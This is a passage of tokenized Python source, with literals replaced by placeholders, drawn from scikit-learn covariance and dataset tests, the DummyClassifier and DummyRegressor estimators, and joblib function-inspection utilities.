precision_ is None ) <EOL> def test_ledoit_wolf ( ) : <EOL> X_centered = X - X . mean ( axis = <NUM_LIT:0> ) <EOL> lw = LedoitWolf ( assume_centered = True ) <EOL> lw . fit ( X_centered ) <EOL> shrinkage_ = lw . shrinkage_ <EOL> score_ = lw . score ( X_centered ) <EOL> assert_almost_equal ( ledoit_wolf_shrinkage ( X_centered , <EOL> assume_centered = True ) , <EOL> shrinkage_ ) <EOL> assert_almost_equal ( ledoit_wolf_shrinkage ( X_centered , assume_centered = True , <EOL> block_size = <NUM_LIT:6> ) , <EOL> shrinkage_ ) <EOL> lw_cov_from_mle , lw_shinkrage_from_mle = ledoit_wolf ( X_centered , <EOL> assume_centered = True ) <EOL> assert_array_almost_equal ( lw_cov_from_mle , lw . covariance_ , <NUM_LIT:4> ) <EOL> assert_almost_equal ( lw_shinkrage_from_mle , lw . shrinkage_ ) <EOL> scov = ShrunkCovariance ( shrinkage = lw . shrinkage_ , assume_centered = True ) <EOL> scov . fit ( X_centered ) <EOL> assert_array_almost_equal ( scov . covariance_ , lw . covariance_ , <NUM_LIT:4> ) <EOL> X_1d = X [ : , <NUM_LIT:0> ] . reshape ( ( - <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> lw = LedoitWolf ( assume_centered = True ) <EOL> lw . fit ( X_1d ) <EOL> lw_cov_from_mle , lw_shinkrage_from_mle = ledoit_wolf ( X_1d , <EOL> assume_centered = True ) <EOL> assert_array_almost_equal ( lw_cov_from_mle , lw . covariance_ , <NUM_LIT:4> ) <EOL> assert_almost_equal ( lw_shinkrage_from_mle , lw . shrinkage_ ) <EOL> assert_array_almost_equal ( ( X_1d ** <NUM_LIT:2> ) . sum ( ) / n_samples , lw . covariance_ , <NUM_LIT:4> ) <EOL> lw = LedoitWolf ( store_precision = False , assume_centered = True ) <EOL> lw . fit ( X_centered ) <EOL> assert_almost_equal ( lw . score ( X_centered ) , score_ , <NUM_LIT:4> ) <EOL> assert ( lw . precision_ is None ) <EOL> lw = LedoitWolf ( ) <EOL> lw . fit ( X ) <EOL> assert_almost_equal ( lw . shrinkage_ , shrinkage_ , <NUM_LIT:4> ) <EOL> assert_almost_equal ( lw . shrinkage_ , ledoit_wolf_shrinkage ( X ) ) <EOL> assert_almost_equal ( lw . 
shrinkage_ , ledoit_wolf ( X ) [ <NUM_LIT:1> ] ) <EOL> assert_almost_equal ( lw . score ( X ) , score_ , <NUM_LIT:4> ) <EOL> lw_cov_from_mle , lw_shinkrage_from_mle = ledoit_wolf ( X ) <EOL> assert_array_almost_equal ( lw_cov_from_mle , lw . covariance_ , <NUM_LIT:4> ) <EOL> assert_almost_equal ( lw_shinkrage_from_mle , lw . shrinkage_ ) <EOL> scov = ShrunkCovariance ( shrinkage = lw . shrinkage_ ) <EOL> scov . fit ( X ) <EOL> assert_array_almost_equal ( scov . covariance_ , lw . covariance_ , <NUM_LIT:4> ) <EOL> X_1d = X [ : , <NUM_LIT:0> ] . reshape ( ( - <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> lw = LedoitWolf ( ) <EOL> lw . fit ( X_1d ) <EOL> lw_cov_from_mle , lw_shinkrage_from_mle = ledoit_wolf ( X_1d ) <EOL> assert_array_almost_equal ( lw_cov_from_mle , lw . covariance_ , <NUM_LIT:4> ) <EOL> assert_almost_equal ( lw_shinkrage_from_mle , lw . shrinkage_ ) <EOL> assert_array_almost_equal ( empirical_covariance ( X_1d ) , lw . covariance_ , <NUM_LIT:4> ) <EOL> X_1sample = np . arange ( <NUM_LIT:5> ) . reshape ( <NUM_LIT:1> , <NUM_LIT:5> ) <EOL> lw = LedoitWolf ( ) <EOL> assert_warns ( UserWarning , lw . fit , X_1sample ) <EOL> assert_array_almost_equal ( lw . covariance_ , <EOL> np . zeros ( shape = ( <NUM_LIT:5> , <NUM_LIT:5> ) , dtype = np . float64 ) ) <EOL> lw = LedoitWolf ( store_precision = False ) <EOL> lw . fit ( X ) <EOL> assert_almost_equal ( lw . score ( X ) , score_ , <NUM_LIT:4> ) <EOL> assert ( lw . precision_ is None ) <EOL> def _naive_ledoit_wolf_shrinkage ( X ) : <EOL> n_samples , n_features = X . shape <EOL> emp_cov = empirical_covariance ( X , assume_centered = False ) <EOL> mu = np . trace ( emp_cov ) / n_features <EOL> delta_ = emp_cov . copy ( ) <EOL> delta_ . flat [ : : n_features + <NUM_LIT:1> ] -= mu <EOL> delta = ( delta_ ** <NUM_LIT:2> ) . sum ( ) / n_features <EOL> X2 = X ** <NUM_LIT:2> <EOL> beta_ = <NUM_LIT:1.> / ( n_features * n_samples ) * np . sum ( np . dot ( X2 . 
T , X2 ) / n_samples - emp_cov ** <NUM_LIT:2> ) <EOL> beta = min ( beta_ , delta ) <EOL> shrinkage = beta / delta <EOL> return shrinkage <EOL> def test_ledoit_wolf_small ( ) : <EOL> X_small = X [ : , : <NUM_LIT:4> ] <EOL> lw = LedoitWolf ( ) <EOL> lw . fit ( X_small ) <EOL> shrinkage_ = lw . shrinkage_ <EOL> assert_almost_equal ( shrinkage_ , _naive_ledoit_wolf_shrinkage ( X_small ) ) <EOL> def test_ledoit_wolf_large ( ) : <EOL> rng = np . random . RandomState ( <NUM_LIT:0> ) <EOL> X = rng . normal ( size = ( <NUM_LIT:10> , <NUM_LIT:20> ) ) <EOL> lw = LedoitWolf ( block_size = <NUM_LIT:10> ) . fit ( X ) <EOL> assert_almost_equal ( lw . covariance_ , np . eye ( <NUM_LIT:20> ) , <NUM_LIT:0> ) <EOL> cov = lw . covariance_ <EOL> lw = LedoitWolf ( block_size = <NUM_LIT> ) . fit ( X ) <EOL> assert_almost_equal ( lw . covariance_ , cov ) <EOL> def test_oas ( ) : <EOL> X_centered = X - X . mean ( axis = <NUM_LIT:0> ) <EOL> oa = OAS ( assume_centered = True ) <EOL> oa . fit ( X_centered ) <EOL> shrinkage_ = oa . shrinkage_ <EOL> score_ = oa . score ( X_centered ) <EOL> oa_cov_from_mle , oa_shinkrage_from_mle = oas ( X_centered , <EOL> assume_centered = True ) <EOL> assert_array_almost_equal ( oa_cov_from_mle , oa . covariance_ , <NUM_LIT:4> ) <EOL> assert_almost_equal ( oa_shinkrage_from_mle , oa . shrinkage_ ) <EOL> scov = ShrunkCovariance ( shrinkage = oa . shrinkage_ , assume_centered = True ) <EOL> scov . fit ( X_centered ) <EOL> assert_array_almost_equal ( scov . covariance_ , oa . covariance_ , <NUM_LIT:4> ) <EOL> X_1d = X [ : , <NUM_LIT:0> : <NUM_LIT:1> ] <EOL> oa = OAS ( assume_centered = True ) <EOL> oa . fit ( X_1d ) <EOL> oa_cov_from_mle , oa_shinkrage_from_mle = oas ( X_1d , assume_centered = True ) <EOL> assert_array_almost_equal ( oa_cov_from_mle , oa . covariance_ , <NUM_LIT:4> ) <EOL> assert_almost_equal ( oa_shinkrage_from_mle , oa . shrinkage_ ) <EOL> assert_array_almost_equal ( ( X_1d ** <NUM_LIT:2> ) . sum ( ) / n_samples , oa . 
covariance_ , <NUM_LIT:4> ) <EOL> oa = OAS ( store_precision = False , assume_centered = True ) <EOL> oa . fit ( X_centered ) <EOL> assert_almost_equal ( oa . score ( X_centered ) , score_ , <NUM_LIT:4> ) <EOL> assert ( oa . precision_ is None ) <EOL> oa = OAS ( ) <EOL> oa . fit ( X ) <EOL> assert_almost_equal ( oa . shrinkage_ , shrinkage_ , <NUM_LIT:4> ) <EOL> assert_almost_equal ( oa . score ( X ) , score_ , <NUM_LIT:4> ) <EOL> oa_cov_from_mle , oa_shinkrage_from_mle = oas ( X ) <EOL> assert_array_almost_equal ( oa_cov_from_mle , oa . covariance_ , <NUM_LIT:4> ) <EOL> assert_almost_equal ( oa_shinkrage_from_mle , oa . shrinkage_ ) <EOL> scov = ShrunkCovariance ( shrinkage = oa . shrinkage_ ) <EOL> scov . fit ( X ) <EOL> assert_array_almost_equal ( scov . covariance_ , oa . covariance_ , <NUM_LIT:4> ) <EOL> X_1d = X [ : , <NUM_LIT:0> ] . reshape ( ( - <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> oa = OAS ( ) <EOL> oa . fit ( X_1d ) <EOL> oa_cov_from_mle , oa_shinkrage_from_mle = oas ( X_1d ) <EOL> assert_array_almost_equal ( oa_cov_from_mle , oa . covariance_ , <NUM_LIT:4> ) <EOL> assert_almost_equal ( oa_shinkrage_from_mle , oa . shrinkage_ ) <EOL> assert_array_almost_equal ( empirical_covariance ( X_1d ) , oa . covariance_ , <NUM_LIT:4> ) <EOL> X_1sample = np . arange ( <NUM_LIT:5> ) . reshape ( <NUM_LIT:1> , <NUM_LIT:5> ) <EOL> oa = OAS ( ) <EOL> assert_warns ( UserWarning , oa . fit , X_1sample ) <EOL> assert_array_almost_equal ( oa . covariance_ , <EOL> np . zeros ( shape = ( <NUM_LIT:5> , <NUM_LIT:5> ) , dtype = np . float64 ) ) <EOL> oa = OAS ( store_precision = False ) <EOL> oa . fit ( X ) <EOL> assert_almost_equal ( oa . score ( X ) , score_ , <NUM_LIT:4> ) <EOL> assert ( oa . precision_ is None ) </s>
<s> """<STR_LIT>""" <EOL> import errno <EOL> import scipy . sparse as sp <EOL> import numpy as np <EOL> from sklearn . datasets import fetch_rcv1 <EOL> from sklearn . utils . testing import assert_almost_equal <EOL> from sklearn . utils . testing import assert_array_equal <EOL> from sklearn . utils . testing import assert_equal <EOL> from sklearn . utils . testing import assert_true <EOL> from sklearn . utils . testing import SkipTest <EOL> def test_fetch_rcv1 ( ) : <EOL> try : <EOL> data1 = fetch_rcv1 ( shuffle = False , download_if_missing = False ) <EOL> except IOError as e : <EOL> if e . errno == errno . ENOENT : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> X1 , Y1 = data1 . data , data1 . target <EOL> cat_list , s1 = data1 . target_names . tolist ( ) , data1 . sample_id <EOL> assert_true ( sp . issparse ( X1 ) ) <EOL> assert_true ( sp . issparse ( Y1 ) ) <EOL> assert_equal ( <NUM_LIT> , X1 . data . size ) <EOL> assert_equal ( <NUM_LIT> , Y1 . data . size ) <EOL> assert_equal ( ( <NUM_LIT> , <NUM_LIT> ) , X1 . shape ) <EOL> assert_equal ( ( <NUM_LIT> , <NUM_LIT> ) , Y1 . shape ) <EOL> assert_equal ( ( <NUM_LIT> , ) , s1 . shape ) <EOL> assert_equal ( <NUM_LIT> , len ( cat_list ) ) <EOL> first_categories = [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' ] <EOL> assert_array_equal ( first_categories , cat_list [ : <NUM_LIT:6> ] ) <EOL> some_categories = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> number_non_zero_in_cat = ( <NUM_LIT:5> , <NUM_LIT> , <NUM_LIT> ) <EOL> for num , cat in zip ( number_non_zero_in_cat , some_categories ) : <EOL> j = cat_list . index ( cat ) <EOL> assert_equal ( num , Y1 [ : , j ] . data . size ) <EOL> data2 = fetch_rcv1 ( shuffle = True , subset = '<STR_LIT:train>' , random_state = <NUM_LIT> , <EOL> download_if_missing = False ) <EOL> X2 , Y2 = data2 . data , data2 . target <EOL> s2 = data2 . sample_id <EOL> assert_array_equal ( np . sort ( s1 [ : <NUM_LIT> ] ) , np . 
sort ( s2 ) ) <EOL> some_sample_ids = ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> for sample_id in some_sample_ids : <EOL> idx1 = s1 . tolist ( ) . index ( sample_id ) <EOL> idx2 = s2 . tolist ( ) . index ( sample_id ) <EOL> feature_values_1 = X1 [ idx1 , : ] . toarray ( ) <EOL> feature_values_2 = X2 [ idx2 , : ] . toarray ( ) <EOL> assert_almost_equal ( feature_values_1 , feature_values_2 ) <EOL> target_values_1 = Y1 [ idx1 , : ] . toarray ( ) <EOL> target_values_2 = Y2 [ idx2 , : ] . toarray ( ) <EOL> assert_almost_equal ( target_values_1 , target_values_2 ) </s>
<s> from __future__ import division <EOL> import warnings <EOL> import numpy as np <EOL> import scipy . sparse as sp <EOL> from . base import BaseEstimator , ClassifierMixin , RegressorMixin <EOL> from . utils import check_random_state <EOL> from . utils . validation import check_array <EOL> from . utils . validation import check_consistent_length <EOL> from . utils . random import random_choice_csc <EOL> from . utils . stats import _weighted_percentile <EOL> from . utils . multiclass import class_distribution <EOL> class DummyClassifier ( BaseEstimator , ClassifierMixin ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , strategy = "<STR_LIT>" , random_state = None , <EOL> constant = None ) : <EOL> self . strategy = strategy <EOL> self . random_state = random_state <EOL> self . constant = constant <EOL> def fit ( self , X , y , sample_weight = None ) : <EOL> """<STR_LIT>""" <EOL> if self . strategy not in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if self . strategy == "<STR_LIT>" and sp . issparse ( y ) : <EOL> y = y . toarray ( ) <EOL> warnings . warn ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> UserWarning ) <EOL> self . sparse_output_ = sp . issparse ( y ) <EOL> if not self . sparse_output_ : <EOL> y = np . atleast_1d ( y ) <EOL> self . output_2d_ = y . ndim == <NUM_LIT:2> <EOL> if y . ndim == <NUM_LIT:1> : <EOL> y = np . reshape ( y , ( - <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> self . n_outputs_ = y . shape [ <NUM_LIT:1> ] <EOL> if self . strategy == "<STR_LIT>" : <EOL> if self . constant is None : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> else : <EOL> constant = np . reshape ( np . atleast_1d ( self . constant ) , ( - <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> if constant . shape [ <NUM_LIT:0> ] != self . n_outputs_ : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" % self . n_outputs_ ) <EOL> ( self . classes_ , <EOL> self . 
n_classes_ , <EOL> self . class_prior_ ) = class_distribution ( y , sample_weight ) <EOL> if ( self . strategy == "<STR_LIT>" and <EOL> any ( constant [ k ] not in self . classes_ [ k ] <EOL> for k in range ( self . n_outputs_ ) ) ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if self . n_outputs_ == <NUM_LIT:1> and not self . output_2d_ : <EOL> self . n_classes_ = self . n_classes_ [ <NUM_LIT:0> ] <EOL> self . classes_ = self . classes_ [ <NUM_LIT:0> ] <EOL> self . class_prior_ = self . class_prior_ [ <NUM_LIT:0> ] <EOL> return self <EOL> def predict ( self , X ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , "<STR_LIT>" ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> X = check_array ( X , accept_sparse = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> n_samples = int ( X . shape [ <NUM_LIT:0> ] ) <EOL> rs = check_random_state ( self . random_state ) <EOL> n_classes_ = self . n_classes_ <EOL> classes_ = self . classes_ <EOL> class_prior_ = self . class_prior_ <EOL> constant = self . constant <EOL> if self . n_outputs_ == <NUM_LIT:1> : <EOL> n_classes_ = [ n_classes_ ] <EOL> classes_ = [ classes_ ] <EOL> class_prior_ = [ class_prior_ ] <EOL> constant = [ constant ] <EOL> if self . strategy == "<STR_LIT>" : <EOL> proba = self . predict_proba ( X ) <EOL> if self . n_outputs_ == <NUM_LIT:1> : <EOL> proba = [ proba ] <EOL> if self . sparse_output_ : <EOL> class_prob = None <EOL> if self . strategy in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> classes_ = [ np . array ( [ cp . argmax ( ) ] ) for cp in class_prior_ ] <EOL> elif self . strategy == "<STR_LIT>" : <EOL> class_prob = class_prior_ <EOL> elif self . strategy == "<STR_LIT>" : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> elif self . strategy == "<STR_LIT>" : <EOL> classes_ = [ np . array ( [ c ] ) for c in constant ] <EOL> y = random_choice_csc ( n_samples , classes_ , class_prob , <EOL> self . random_state ) <EOL> else : <EOL> if self . 
strategy in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> y = np . tile ( [ classes_ [ k ] [ class_prior_ [ k ] . argmax ( ) ] for <EOL> k in range ( self . n_outputs_ ) ] , [ n_samples , <NUM_LIT:1> ] ) <EOL> elif self . strategy == "<STR_LIT>" : <EOL> y = np . vstack ( classes_ [ k ] [ proba [ k ] . argmax ( axis = <NUM_LIT:1> ) ] for <EOL> k in range ( self . n_outputs_ ) ) . T <EOL> elif self . strategy == "<STR_LIT>" : <EOL> ret = [ classes_ [ k ] [ rs . randint ( n_classes_ [ k ] , size = n_samples ) ] <EOL> for k in range ( self . n_outputs_ ) ] <EOL> y = np . vstack ( ret ) . T <EOL> elif self . strategy == "<STR_LIT>" : <EOL> y = np . tile ( self . constant , ( n_samples , <NUM_LIT:1> ) ) <EOL> if self . n_outputs_ == <NUM_LIT:1> and not self . output_2d_ : <EOL> y = np . ravel ( y ) <EOL> return y <EOL> def predict_proba ( self , X ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , "<STR_LIT>" ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> X = check_array ( X , accept_sparse = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> n_samples = int ( X . shape [ <NUM_LIT:0> ] ) <EOL> rs = check_random_state ( self . random_state ) <EOL> n_classes_ = self . n_classes_ <EOL> classes_ = self . classes_ <EOL> class_prior_ = self . class_prior_ <EOL> constant = self . constant <EOL> if self . n_outputs_ == <NUM_LIT:1> and not self . output_2d_ : <EOL> n_classes_ = [ n_classes_ ] <EOL> classes_ = [ classes_ ] <EOL> class_prior_ = [ class_prior_ ] <EOL> constant = [ constant ] <EOL> P = [ ] <EOL> for k in range ( self . n_outputs_ ) : <EOL> if self . strategy == "<STR_LIT>" : <EOL> ind = class_prior_ [ k ] . argmax ( ) <EOL> out = np . zeros ( ( n_samples , n_classes_ [ k ] ) , dtype = np . float64 ) <EOL> out [ : , ind ] = <NUM_LIT:1.0> <EOL> elif self . strategy == "<STR_LIT>" : <EOL> out = np . ones ( ( n_samples , <NUM_LIT:1> ) ) * class_prior_ [ k ] <EOL> elif self . strategy == "<STR_LIT>" : <EOL> out = rs . 
multinomial ( <NUM_LIT:1> , class_prior_ [ k ] , size = n_samples ) <EOL> elif self . strategy == "<STR_LIT>" : <EOL> out = np . ones ( ( n_samples , n_classes_ [ k ] ) , dtype = np . float64 ) <EOL> out /= n_classes_ [ k ] <EOL> elif self . strategy == "<STR_LIT>" : <EOL> ind = np . where ( classes_ [ k ] == constant [ k ] ) <EOL> out = np . zeros ( ( n_samples , n_classes_ [ k ] ) , dtype = np . float64 ) <EOL> out [ : , ind ] = <NUM_LIT:1.0> <EOL> P . append ( out ) <EOL> if self . n_outputs_ == <NUM_LIT:1> and not self . output_2d_ : <EOL> P = P [ <NUM_LIT:0> ] <EOL> return P <EOL> def predict_log_proba ( self , X ) : <EOL> """<STR_LIT>""" <EOL> proba = self . predict_proba ( X ) <EOL> if self . n_outputs_ == <NUM_LIT:1> : <EOL> return np . log ( proba ) <EOL> else : <EOL> return [ np . log ( p ) for p in proba ] <EOL> class DummyRegressor ( BaseEstimator , RegressorMixin ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , strategy = "<STR_LIT>" , constant = None , quantile = None ) : <EOL> self . strategy = strategy <EOL> self . constant = constant <EOL> self . quantile = quantile <EOL> def fit ( self , X , y , sample_weight = None ) : <EOL> """<STR_LIT>""" <EOL> if self . strategy not in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % self . strategy ) <EOL> y = check_array ( y , ensure_2d = False ) <EOL> if len ( y ) == <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> self . output_2d_ = y . ndim == <NUM_LIT:2> <EOL> if y . ndim == <NUM_LIT:1> : <EOL> y = np . reshape ( y , ( - <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> self . n_outputs_ = y . shape [ <NUM_LIT:1> ] <EOL> check_consistent_length ( X , y , sample_weight ) <EOL> if self . strategy == "<STR_LIT>" : <EOL> self . constant_ = np . average ( y , axis = <NUM_LIT:0> , weights = sample_weight ) <EOL> elif self . strategy == "<STR_LIT>" : <EOL> if sample_weight is None : <EOL> self . constant_ = np . 
median ( y , axis = <NUM_LIT:0> ) <EOL> else : <EOL> self . constant_ = [ _weighted_percentile ( y [ : , k ] , sample_weight , <EOL> percentile = <NUM_LIT> ) <EOL> for k in range ( self . n_outputs_ ) ] <EOL> elif self . strategy == "<STR_LIT>" : <EOL> if self . quantile is None or not np . isscalar ( self . quantile ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" % self . quantile ) <EOL> percentile = self . quantile * <NUM_LIT> <EOL> if sample_weight is None : <EOL> self . constant_ = np . percentile ( y , axis = <NUM_LIT:0> , q = percentile ) <EOL> else : <EOL> self . constant_ = [ _weighted_percentile ( y [ : , k ] , sample_weight , <EOL> percentile = percentile ) <EOL> for k in range ( self . n_outputs_ ) ] <EOL> elif self . strategy == "<STR_LIT>" : <EOL> if self . constant is None : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . constant = check_array ( self . constant , <EOL> accept_sparse = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> ensure_2d = False , ensure_min_samples = <NUM_LIT:0> ) <EOL> if self . output_2d_ and self . constant . shape [ <NUM_LIT:0> ] != y . shape [ <NUM_LIT:1> ] : <EOL> raise ValueError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % y . shape [ <NUM_LIT:1> ] ) <EOL> self . constant_ = self . constant <EOL> self . constant_ = np . reshape ( self . constant_ , ( <NUM_LIT:1> , - <NUM_LIT:1> ) ) <EOL> return self <EOL> def predict ( self , X ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , "<STR_LIT>" ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> X = check_array ( X , accept_sparse = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> n_samples = X . shape [ <NUM_LIT:0> ] <EOL> y = np . ones ( ( n_samples , <NUM_LIT:1> ) ) * self . constant_ <EOL> if self . n_outputs_ == <NUM_LIT:1> and not self . output_2d_ : <EOL> y = np . ravel ( y ) <EOL> return y </s>
<s> """<STR_LIT>""" <EOL> from itertools import islice <EOL> import inspect <EOL> import warnings <EOL> import re <EOL> import os <EOL> from . _compat import _basestring <EOL> from . logger import pformat <EOL> from . _memory_helpers import open_py_source <EOL> from . _compat import PY3_OR_LATER <EOL> def get_func_code ( func ) : <EOL> """<STR_LIT>""" <EOL> source_file = None <EOL> try : <EOL> code = func . __code__ <EOL> source_file = code . co_filename <EOL> if not os . path . exists ( source_file ) : <EOL> source_code = '<STR_LIT>' . join ( inspect . getsourcelines ( func ) [ <NUM_LIT:0> ] ) <EOL> line_no = <NUM_LIT:1> <EOL> if source_file . startswith ( '<STR_LIT>' ) : <EOL> source_file , line_no = re . match ( <EOL> '<STR_LIT>' , <EOL> source_file ) . groups ( ) <EOL> line_no = int ( line_no ) <EOL> source_file = '<STR_LIT>' % source_file <EOL> return source_code , source_file , line_no <EOL> with open_py_source ( source_file ) as source_file_obj : <EOL> first_line = code . co_firstlineno <EOL> source_lines = list ( islice ( source_file_obj , first_line - <NUM_LIT:1> , None ) ) <EOL> return '<STR_LIT>' . join ( inspect . getblock ( source_lines ) ) , source_file , first_line <EOL> except : <EOL> if hasattr ( func , '<STR_LIT>' ) : <EOL> return str ( func . __code__ . __hash__ ( ) ) , source_file , - <NUM_LIT:1> <EOL> else : <EOL> return repr ( func ) , source_file , - <NUM_LIT:1> <EOL> def _clean_win_chars ( string ) : <EOL> """<STR_LIT>""" <EOL> import urllib <EOL> if hasattr ( urllib , '<STR_LIT>' ) : <EOL> quote = urllib . quote <EOL> else : <EOL> import urllib . parse <EOL> quote = urllib . parse . quote <EOL> for char in ( '<STR_LIT:<>' , '<STR_LIT:>>' , '<STR_LIT:!>' , '<STR_LIT::>' , '<STR_LIT:\\>' ) : <EOL> string = string . replace ( char , quote ( char ) ) <EOL> return string <EOL> def get_func_name ( func , resolv_alias = True , win_characters = True ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( func , '<STR_LIT>' ) : <EOL> module = func . 
__module__ <EOL> else : <EOL> try : <EOL> module = inspect . getmodule ( func ) <EOL> except TypeError : <EOL> if hasattr ( func , '<STR_LIT>' ) : <EOL> module = func . __class__ . __module__ <EOL> else : <EOL> module = '<STR_LIT>' <EOL> if module is None : <EOL> module = '<STR_LIT>' <EOL> if module == '<STR_LIT:__main__>' : <EOL> try : <EOL> filename = os . path . abspath ( inspect . getsourcefile ( func ) ) <EOL> except : <EOL> filename = None <EOL> if filename is not None : <EOL> parts = filename . split ( os . sep ) <EOL> if parts [ - <NUM_LIT:1> ] . startswith ( '<STR_LIT>' ) : <EOL> parts [ - <NUM_LIT:1> ] = '<STR_LIT>' <EOL> filename = '<STR_LIT:->' . join ( parts ) <EOL> if filename . endswith ( '<STR_LIT>' ) : <EOL> filename = filename [ : - <NUM_LIT:3> ] <EOL> module = module + '<STR_LIT:->' + filename <EOL> module = module . split ( '<STR_LIT:.>' ) <EOL> if hasattr ( func , '<STR_LIT>' ) : <EOL> name = func . func_name <EOL> elif hasattr ( func , '<STR_LIT>' ) : <EOL> name = func . __name__ <EOL> else : <EOL> name = '<STR_LIT>' <EOL> if resolv_alias : <EOL> if hasattr ( func , '<STR_LIT>' ) and name in func . func_globals : <EOL> if not func . func_globals [ name ] is func : <EOL> name = '<STR_LIT>' % name <EOL> if inspect . ismethod ( func ) : <EOL> if hasattr ( func , '<STR_LIT>' ) : <EOL> klass = func . im_class <EOL> module . append ( klass . __name__ ) <EOL> if os . name == '<STR_LIT>' and win_characters : <EOL> name = _clean_win_chars ( name ) <EOL> module = [ _clean_win_chars ( s ) for s in module ] <EOL> return module , name <EOL> def getfullargspec ( func ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return inspect . getfullargspec ( func ) <EOL> except AttributeError : <EOL> arg_spec = inspect . getargspec ( func ) <EOL> import collections <EOL> tuple_fields = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> tuple_type = collections . namedtuple ( '<STR_LIT>' , tuple_fields ) <EOL> return tuple_type ( args = arg_spec . args , <EOL> varargs = arg_spec . 
varargs , <EOL> varkw = arg_spec . keywords , <EOL> defaults = arg_spec . defaults , <EOL> kwonlyargs = [ ] , <EOL> kwonlydefaults = None , <EOL> annotations = { } ) <EOL> def _signature_str ( function_name , arg_spec ) : <EOL> """<STR_LIT>""" <EOL> arg_spec_for_format = arg_spec [ : <NUM_LIT:7> if PY3_OR_LATER else <NUM_LIT:4> ] <EOL> arg_spec_str = inspect . formatargspec ( * arg_spec_for_format ) <EOL> return '<STR_LIT>' . format ( function_name , arg_spec_str ) <EOL> def _function_called_str ( function_name , args , kwargs ) : <EOL> """<STR_LIT>""" <EOL> template_str = '<STR_LIT>' <EOL> args_str = repr ( args ) [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> kwargs_str = '<STR_LIT:U+002CU+0020>' . join ( '<STR_LIT>' % ( k , v ) <EOL> for k , v in kwargs . items ( ) ) <EOL> return template_str . format ( function_name , args_str , <EOL> kwargs_str ) <EOL> def filter_args ( func , ignore_lst , args = ( ) , kwargs = dict ( ) ) : <EOL> """<STR_LIT>""" <EOL> args = list ( args ) <EOL> if isinstance ( ignore_lst , _basestring ) : <EOL> raise ValueError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( ignore_lst , type ( ignore_lst ) ) ) <EOL> if ( not inspect . ismethod ( func ) and not inspect . isfunction ( func ) ) : <EOL> if ignore_lst : <EOL> warnings . warn ( '<STR_LIT>' <EOL> '<STR_LIT>' % func , stacklevel = <NUM_LIT:2> ) <EOL> return { '<STR_LIT:*>' : args , '<STR_LIT>' : kwargs } <EOL> arg_spec = getfullargspec ( func ) <EOL> arg_names = arg_spec . args + arg_spec . kwonlyargs <EOL> arg_defaults = arg_spec . defaults or ( ) <EOL> arg_defaults = arg_defaults + tuple ( arg_spec . kwonlydefaults [ k ] <EOL> for k in arg_spec . kwonlyargs ) <EOL> arg_varargs = arg_spec . varargs <EOL> arg_varkw = arg_spec . varkw <EOL> if inspect . ismethod ( func ) : <EOL> args = [ func . 
__self__ , ] + args <EOL> _ , name = get_func_name ( func , resolv_alias = False ) <EOL> arg_dict = dict ( ) <EOL> arg_position = - <NUM_LIT:1> <EOL> for arg_position , arg_name in enumerate ( arg_names ) : <EOL> if arg_position < len ( args ) : <EOL> if arg_name not in arg_spec . kwonlyargs : <EOL> arg_dict [ arg_name ] = args [ arg_position ] <EOL> else : <EOL> raise ValueError ( <EOL> "<STR_LIT>" <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % ( arg_name , <EOL> _signature_str ( name , arg_spec ) , <EOL> _function_called_str ( name , args , kwargs ) ) <EOL> ) <EOL> else : <EOL> position = arg_position - len ( arg_names ) <EOL> if arg_name in kwargs : <EOL> arg_dict [ arg_name ] = kwargs . pop ( arg_name ) <EOL> else : <EOL> try : <EOL> arg_dict [ arg_name ] = arg_defaults [ position ] <EOL> except ( IndexError , KeyError ) : <EOL> raise ValueError ( <EOL> '<STR_LIT>' <EOL> 